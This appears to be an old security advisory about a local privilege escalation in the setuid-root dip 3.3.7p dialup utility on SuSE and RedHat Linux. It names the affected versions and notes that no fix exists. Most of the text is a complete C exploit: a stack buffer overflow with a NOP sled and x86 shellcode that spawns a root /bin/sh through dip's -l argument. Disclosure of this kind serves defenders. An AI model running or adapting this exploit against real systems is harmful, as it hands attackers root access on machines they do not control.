|
Vulnerability dip Affected dip 3.3.7p Description 'sebi hegi' found following. After doing a check on his SuSE linux 7.0 x86 he found something interesting: hegi@faust:~ > ls -la /usr/sbin/dip -rwsr-xr-- 1 root dialout 62056 Jul 29 2000 /usr/sbin/dip DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96) Written by Fred N. van Kempen, MicroWalt Corporation. Looks like this version is still vulnerable although it went public in 1998. It's not world executable but still a security risk on SuSE 7.0. And we are wondering why at least SuSE still shippes a product with a known vulnerability. /* Linux x86 dip 3.3.7p exploit by pr10n */ #include <stdio.h> #define NOP 0x90 /*thanks to hack.co.za*/ char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d" "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3" "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh"; unsigned long get_sp(void){ __asm__("movl %esp, %eax");} main(int argc, char *argv[]){ char buf[136]; int i; int offset=0,*ptr; long ret; if(argc!=2){ printf("usage: %s offset\n",argv[0]); exit(0);} offset=atoi(argv[1]); ret=(get_sp()-offset); for(i=1;i<136;i+=4){ *(long *)&buf[i]=ret;} printf("\nusing: 0x%x\n\n",ret); for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++) buf[i]=NOP; memcpy(buf+i,shellcode,strlen(shellcode)); execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0); } The same packet and problem is on SuSe 7.1 and RedHat 6.2. SuSE 6.2 and 6.3 are also vulnerable and setuid root. But normal users, just like on SuSE 7.0, don't have execute permissions on these versions. Solution Nothing yet.